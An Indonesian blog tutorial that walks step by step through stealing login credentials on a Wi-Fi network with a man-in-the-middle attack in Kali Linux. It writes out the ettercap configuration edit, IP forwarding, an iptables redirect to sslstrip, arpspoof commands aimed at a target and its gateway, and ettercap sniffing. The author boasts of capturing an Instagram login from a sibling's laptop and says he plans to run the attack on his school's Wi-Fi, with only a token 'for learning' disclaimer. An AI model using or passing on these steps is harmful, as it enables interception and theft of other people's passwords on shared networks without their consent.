Mencuri Username dan Password pada Jaringan Wifi menggunakan Kali Linux

Hello World  kali ini kami akan Share Mencuri Username dan Password pada Jaringan Wifi menggunakan Kali Linux.

 seperti biasa, di tutorial ini kami mempraktekannya di Kali Linux, untuk para penjinak pinguin yang lain, silahkan di icip di pinguin2 kesayangan anda.
di Tutorial ini Kita akan padukan Teknik MITM & Sniffing.

Teknik ini biasa di sebut Man In The Middle Attack (MITM)

Apa itu MITM ?


Serangan Man in The Middle (MiTM) adalah salah satu serangan hacking yang dilakukan dari dalam jaringan untuk melakukan penyadapan informasi dengan cara membelokkan jalur koneksi dimana penyerang berada di antara dua target yang sedang melakukan komunikasi



Biar gak penasaran langsung saja bro kita praktekkan


Pertama kita buka terlebih dahulu konfigurasi ettercap yang berada di folder /etc/ettercap/ kita buka menggunkan leafpad

leafpad /etc/ettercap/etter.conf




selanjutnya cari kata # if you use iptables: kemudian hilangkan tanda pagar di depan redir_command_on dan redir_command_off




Menjadi




selanjutnya kita aktifkan IP Forward dengan perintah


echo 1 > /proc/sys/net/ipv4/ip_forward




kemudian redirect port 80 ke 10000, agar koneksi pada port default akses web (80) kita redirect ke port SSLSTRIP yang kita gunakan untuk menterjemahkan akses HTTPS ke HTTP, dengan perintah


iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000





sebelum ke tahap selanjutnya kita harus mengatahui ip gateway dan ip target terlebih dahulu,


untuk mengetahui ip gateway cukup ketikkan di terminal

route -n





selanjutnya untuk mengetahui ip target disini saya menggunakan angry ip scanner, kalian juga bisa menggunakan autoscan-network, nmap dan sebagainya

disini saya sudah mendapatkan target yg sedang aktif di jaringan wifi






Selanjutnya lakukan spoof arp menggunakan arpspoof

arpspoof -i wlan0 -t 192.168.1.102 192.168.1.254


keterangan:
wlan0               : jenis interface yang digunakan 
192.168.1.102 : Ip target
192.168.1.254 : ip gateway



Sejanjutnya buka terminal baru untuk menjalankan sslstrip, perintahnya


sslstrip -akf 


Buka terminal baru lagi untuk melakukan sniffing dengan menggunakan ettercap

ettercap -T -q -i wlan0 -M arp // //







Jadi nanti jika target mengakses situs-situs yang memerlukan login, akan muncul detail user dan password serta link situs yang dia buka, di bawah Hit.

seperti di gambar:


Terlihat username dan pasword korban sedang login di instagram

wkwkw, maaf SS korban masih makai SS dari blognya bang anherr >.<

abis dari tadi gw nunggu korban gak buka2 situs, yep korbannya laptop adik gw sendiri wkwkw. ternyata dia lg fokus ngerjain tugas. gak sama sekali buka web sosmed -_-
niatnya pgn gw praktekin ke wifi sekolah bsk ^^

Postingan berikut dibuat hanya sebagai pembelajaran saja ya bro, jadi jangan di salah gunakan, gunakan ilmu dengan bijak :D


Mudahkan o.O ? Stay Cool and Keep ./Crotz ,gaes :'v


Posting Komentar

0 Komentar